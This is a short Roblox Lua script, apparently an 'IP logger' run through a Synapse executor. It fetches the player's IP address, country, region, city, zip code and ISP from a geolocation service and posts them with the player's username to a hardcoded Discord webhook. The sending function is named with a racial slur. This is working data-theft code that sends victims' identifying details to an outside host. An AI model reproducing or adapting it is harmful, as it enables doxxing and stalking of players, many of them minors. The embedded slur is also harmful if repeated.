Logger
Logger
LocalPlayer
local webhook_url =
"https://discord.com/api/webhooks/1309705976802185237/KjWZqaPELqRfCSsfJP3r2EGHGvSXS
NG3PCickPS7lCIGJ6ivEEa2djynQntrWoUtqp-j"
local ip_info = syn.request({
Url = "http://ip-api.com/json",
Method = "GET"
})
local ipinfo_table = game:GetService("HttpService"):JSONDecode(ip_info.Body)
local embed = {
title = "STXLLARLOGGER",
color = 0x3498db,
fields = {
{ name = "Username", value = player.Name, inline = true },
{ name = "Display Name", value = player.DisplayName, inline = true },
{ name = "Time", value = os.date('%d/%m/%Y %H:%M'), inline = true },
{ name = "Game", value =
game:GetService('MarketplaceService'):GetProductInfo(game.PlaceId).Name, inline =
true },
{ name = "Country", value = ipinfo_table.country, inline = true },
{ name = "Country Code", value = ipinfo_table.countryCode, inline = true },
{ name = "Region", value = ipinfo_table.region, inline = true },
{ name = "Region Name", value = ipinfo_table.regionName, inline = true },
{ name = "City", value = ipinfo_table.city, inline = true },
{ name = "Zipcode", value = ipinfo_table.zip, inline = true },
{ name = "ISP", value = ipinfo_table.isp, inline = true },
{ name = "Org", value = ipinfo_table.org, inline = true },
{ name = "IP", value = ipinfo_table.query, inline = true },
}
}
function getfuckednigga()
syn.request({
Url = webhook_url,
Method = "POST",
Headers = {
["Content-Type"] = "application/json"
},
Body = game:GetService("HttpService"):JSONEncode({embeds = {embed}})
})
end